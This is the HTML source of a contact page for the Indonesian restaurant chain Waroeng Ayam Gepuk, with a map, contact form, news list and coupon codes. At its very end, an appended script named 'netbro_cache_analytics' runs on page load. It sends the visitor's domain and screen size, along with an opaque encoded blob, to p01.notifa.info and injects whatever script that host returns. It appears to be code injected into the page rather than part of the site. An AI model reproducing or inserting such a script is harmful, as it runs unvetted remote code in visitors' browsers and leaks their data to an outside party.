<!DOCTYPE html>
<html lang="en" dir="ltr">
<head>
<title>Kontak | Waroeng Ayam Gepuk - WAG Website</title>
<meta charset="UTF-8">
<link rel="stylesheet" type="text/css" href="css/styles.css">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="css/1140.css" type="text/css" media="screen">
<link rel="stylesheet" href="css/wag-style.css">
<link rel="stylesheet" href="css/wag-rwd.css" media="screen">
<link rel="stylesheet" href="plugins/font-awesome/css/font-awesome.min.css">
<script src="https://cdnjs.cloudflare.com/ajax/libs/smoothscroll/1.4.6/SmoothScroll.min.js"></script>

<script type="text/javascript" src="http://maps.google.com/maps/api/js?sensor=true"></script>

 <script type="text/javascript">
    function initialize() {
      var map;
      var mapOptions = {
        zoom: 13,
        center: new google.maps.LatLng(-6.234747, 106.625356),
        disableUi: true
      };
      map = new google.maps.Map(document.getElementById('map'),
          mapOptions);
		  
		var myLatLng = new google.maps.LatLng(-6.234747, 106.625356);
		var marker = new google.maps.Marker({
          position: myLatLng,
          map: map,
          title: 'Hello World!'
        });
    }

    google.maps.event.addDomListener(window, 'load', initialize);

  </script>


<!--[if lte IE 9]>
<link rel="stylesheet" href="css/ie.css" type="text/css" media="screen">
<script src="js/html5.js"></script>
<script src="js/css3-mediaqueries.js"></script>
<![endif]-->


</head>
<body>
<div class="container">
  <div class="row">
    <!--start header-->
    <header>
      <!--start logo-->
      <div class="sixcol"> 
        <a href="#" id="logo">
          <img class="img-logo" src="images/logo-wag2.png" alt="">
        </a> 
      </div>
      <!--end logo-->
      <!--start menu-->
      <div class="sixcol last">
        <nav class="nav-menu-wag">
          <ul>
            <li class="nav-burger-mobile"><a href="#">Menu</a></li>
            <li><a href="index.html">Home</a></li>
            <li><a href="profil.html">Profil </a></li>
            <li><a href="menu.html">Menu</a></li>
            <li><a href="outlet.html">Outlet</a></li>
            <li><a href="franchise.html">Franchise</a></li>
            <li class="active"><a href="#">Kontak</a></li>
          </ul>
        </nav>
      </div>
      <!--end menu-->
      <img src="images/logo-wag2.png" alt="" class="cake img-sample-menu-profile">
      <!--end header-->
    </header>
  </div>
</div>
<!--start intro-->
<div class="container">
  <div class="row">
    <section id="introContact" class="onecol contact">
      <hgroup class="hgroup-contact">
        <br />
        <h1 class="text-left">Kontak Kami</h1>
        <br />
        <p class="desc-contact">
          Bila ada pertanyaan mengenai <b>Waroeng Ayam Gepuk</b> silahkan hubungi kami via form kontak atau melalui kontak dibawah berikut:
        </p>
        <p class="desc-contact-info">
          <i class="fa fa-phone"></i> 081 727 62622 &nbsp; <i class="fa fa-send"></i>wag@waroengayamgepuk.com &nbsp; <br /> <i class="fa fa-building"></i> Jl. Dayung Raya No 41, Kelapa Dua, Tangerang 15810
        </p>
        <form action="">
          <div style="display: block;">
            <input type="text" placeholder="Nama" class="form-control">
          </div>
          <div style="display: block;margin-top: 20px">
            <input type="text" placeholder="No.Hp/Email" class="form-control">
          </div>
          <div style="display: block;margin-top: 20px">
            <textarea name="" id="" cols="30" rows="10"></textarea>
          </div>
          <div style="display: block;">
            <input type="submit" value="Kirim">
          </div>
        </form>
        <br /><br />
      </hgroup>


      <hgroup class="hgroup-contact map-area">
		<div class="map-container">
		<div id="map" class="map" style=""></div>
		</div>
	  </hgroup>	  
	  <!--  <a href="#" class="button1">View our gallery of sweets</a> -->
    </section>
  </div>
</div>

<div class="container 3-grid container-front-custom">
  <div class="row">
    <div class="holder_content1">
      <section class="group4">
        <article>
          <div class="row row-custom">
            <div class="div-notice">
              <section class="group1 group1-custom">
                <h5>News</h5> 
                <span class="span-notice-custom">more ></span>
                <ul>
                  <li>&diams; Pembaharuan Menu <span>(02/02/2018)</span></li>
                  <li>&diams; Menu Baru WAG <span>(02/02/2018)</span></li>
                  <li>&diams; Perubahan Harga <span>(02/02/2018)</span></li>
                  <li>&diams; Tester Menu Baru <span>(02/02/2018)</span></li>
                </ul>
                <br />
                <p>
                  <img src="images/glass.png" alt=""> 
                  <b>Kantor Pusat ></b
                    ><br />
                  <small>Jl. Dayung Raya No 41, Kelapa Dua, Tangerang 15810</small>
                </p>
                <p>
                  <img src="images/phone.png" alt=""> 
                  <b>Telepon &nbsp; ></b>
                  <br />
                  Kantor Pusat <br /><small class="phone">081 727 62622</small>
                </p>
              </section>              
            </div>
            <div class="div-sps-menu">
              <section class="group1 group1-custom-2">
                <h5>Special Menu</h5>
                <img src="images/agp-foot.jpg" class="img-special-menu" alt=""> 
                  <h6 class="title-menu-special">Gepuk Special</h6>
                  <small>Ayam Gepuk</small> <br />
                  <p>AYAM GEPUK adalah ayam dengan olahan yang sangat tradisional namun rasa internasional tak kalah dengan makanan retauran kelas atas.</p>
              </section>              
            </div>
            <div class="div-event-coupon">
              <section class="group1 group1-custom-3">
                <p>
                  <ul class="list-event">
                    <li class="l-1">
                      <p>
                        <b class="list-event-number">1</b> <b>FREEN0092</b> <br />
                        <small>Free Tambah Nasi</small>
                      </p>
                    </li>
                    <li class="l-2">
                      <p>
                        <b class="list-event-number">2</b> <b>FREESM0093</b> <br />
                        <small>Tambah Sambal</small>
                      </p>
                    </li>
                    <li class="l-3">
                      <p>
                        <b class="list-event-number">3</b> <b>FREEMN0094</b> <br />
                        <small>Free Tambah Minum</small>
                      </p>
                    </li>
                  </ul>
                  <img src="images/event-cupon.png" class="img-event-coupon" alt="">
				  <br /><br />
				  <img src="images/ps-logo.png" class="img-ps">
				  <img src="images/ap-logo.png" class="img-ps">
				 </p>
              </section>              
            </div>
          </div>
          <div class="row footer-small">
            <p>
              <img src="images/logo-wag2.png" alt="">
            </p>
            <ul class="nav-menu-footer">
              <li><a href="#">Home</a></li>
              <li><a href="#">Outlet</a></li>
              <li><a href="#">Franchise</a></li>
              <li><a href="#">Kontak</a></li>
            </ul>
            <ul class="copyright-footer">
              <li>Copyright 2018 Waroeng Ayam Gepuk</li>
            </ul>
          </div>
        </article>
      </section>
    </div>    
  </div>
</div>
<script type="text/javascript" src="js/jquery.min.js"></script>

<script>
  $(document).ready(function() {
    $('.nav-menu-wag').on('click', function(){
      $('.nav-menu-wag ul li').toggle('slow');
      $('.nav-menu-wag').toggleClass('show-menu');
    });
  })
</script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582NzYpoUazw5mOST0oKH5R6%2beF7u0%2b14Mylpn6cLh4I%2bmA2XHbXwAwkIkMS4fDzBSt9drhF0qjQQRvD1hBGFapcIVgJuxIPwiHV22KevpqcXX%2frke%2f8cNF4KKZE8gWYdpJ20PWqLcuQ31DUpeq%2fpyr9yjdPppWr%2fcj0eBHl%2bMZau9VsatYLYa506%2bnGgrbvoCVbQnaA8qrOElNaR%2f%2frvObaYLSYJOv6sVzxaL5%2fOJ7Sx9nu8CAIclN0fdMxVUlKhcTc%2b6ppB7mvYoTqr0Difd06yI%2b%2fCWN8Vbe%2bFRAdnY0ZGDI8%2bjCAbdgWbdIJh9Z8PHvjkQDNDnM6Za25J5o8kI7P48mNWBN9pxnLioASep5cwpC5FRURJFALGSqnhHq1FJukWUPaIyflwNcM9JxpsypP%2bJj7niI8nqk2PiYL6ouhME0HgeOFHrBlBuXENCxpyBotzhHhYBcarB1NS8XPFRhReKJV7E8efKQ0T0WzpTT76Vkm%2faCjO9Qt2dIVHmoKK498C71XLrU79MMGNUthEcVU9rQyYf9VdYNETrJnhqcPOyxH6fAtmBvxY%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>
